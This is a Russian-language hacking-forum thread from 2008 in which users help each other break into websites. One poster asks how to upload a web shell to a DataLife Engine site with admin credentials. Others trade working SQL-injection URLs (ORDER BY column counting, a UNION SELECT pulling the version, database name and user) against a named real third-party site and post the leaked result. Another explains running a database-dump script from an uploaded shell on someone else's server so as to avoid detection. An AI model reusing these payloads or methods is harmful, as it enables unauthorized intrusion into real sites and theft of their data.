27.01.2008, 17:13
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
С нами:
9734371
Репутация:
3
|
|
Здравствуйте! 
Подскажите, как залить шелл на сервер, если есть логин и пароль администратора DataLife Engine (апдейт конца 2007 года)?
Спасибо! |
|
|
27.01.2008, 18:29
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
С нами:
10009826
Репутация:
435
|
|
Может кто подскажет, видно что есть sql инжект. все подходит , но начинаю подбирать поля, и бесплоезно сколько бы не ставил там 1,2...30/* и все равно The used SELECT statements have a different number of columns, и что делать мож кто подскажет?
|
|
|
|
27.01.2008, 18:34
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
Сообщение от Sharingan
Может кто подскажет, видно что есть sql инжект. все подходит , но начинаю подбирать поля, и бесплоезно сколько бы не ставил там 1,2...30/* и все равно The used SELECT statements have a different number of columns, и что делать мож кто подскажет?
Попробуй перебирать с помощью ORDER BY. Почитай об этом тут http://forum.antichat.ru/thread43966.html.
А еще там может быть два запроса с разным количеством полей. В этом варианте посимвольный брут.
__________________
Кто я?..
|
|
|
|
27.01.2008, 18:43
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
С нами:
10009826
Репутация:
435
|
|
ордер бай не пашет, вроде
http://atv.worcsracing.com/tracks.php?ID=-1+union+select+1/*
посмотрите кто нить как там
|
|
|
|
27.01.2008, 18:50
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Сообщение от Sharingan
ордер бай не пашет, вроде
http://atv.worcsracing.com/tracks.php?ID=-1+union+select+1/*
посмотрите кто нить как там
Пашет, попробуй так
http://atv.worcsracing.com/tracks.php?ID=-1+order+by+26/*
и так
http://atv.worcsracing.com/tracks.php?ID=-1+order+by+25/*
http://atv.worcsracing.com/tracks.php?ID=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,1,1,1,1,1,1/*
4.0.21-nt/worcsatv/root@localhost
Последний раз редактировалось ElteRUS; 27.01.2008 в 18:53..
|
|
|
|
27.01.2008, 21:51
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
С нами:
9739767
Репутация:
3
|
|
.Slip , Constantine, спасибо за отклик! Только вот не бейте ногами, объясните как ентот скрипт в винде то запустить  |
|
|
|
27.01.2008, 22:14
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от Derec
.Slip , Constantine, спасибо за отклик! Только вот не бейте ногами, объясните как ентот скрипт в винде то запустить Или так как написал Afost, или одно из двух(:
Если большая база (мне пришлось 1к. дампить), то что бы не спалиться дико, запускай с шелла. Заливай файл с расширением .pl на сервер, и запускаешь такой командой:
perl blablabla.pl 400
где 400 - нужное кол-во записей для сохранения. Скорей всего тебя скинет с шелла, т.к. скорость работы скрипта невысокая (будет тайм-аут), то ждёшь энное время и заходишь заново в папку , там уже должен лежать файл mda.txt . Если его размер 0 байт, то ждёшь ещё= ) Если всё таки хочешь запускать со своего компа, то ставишь актив перл и в cmd пишешь blablabla.pl 400
Последний раз редактировалось .Slip; 27.01.2008 в 22:21..
|
|
|
|
27.01.2008, 21:57
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
устанавливаешь perl-интерпретатор. Потом
пуск->
выполнить->
cmd->
<путь к интерпретатору>/perl.exe <путь к скрипту>/script.pl
|
|
|
|
27.01.2008, 22:25
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
С нами:
9739767
Репутация:
3
|
|
Aга, спасибо. Но вы уж простите, не могу отблагодарить плюсиком А вот этот шелл он должен быть получается на локальном хосте? |
|
|
|
27.01.2008, 22:26
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Нет, как раз с локалхоста ты можешь запустить через консоль(цмд). Шелл должен быть на любом стороннем серванте.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
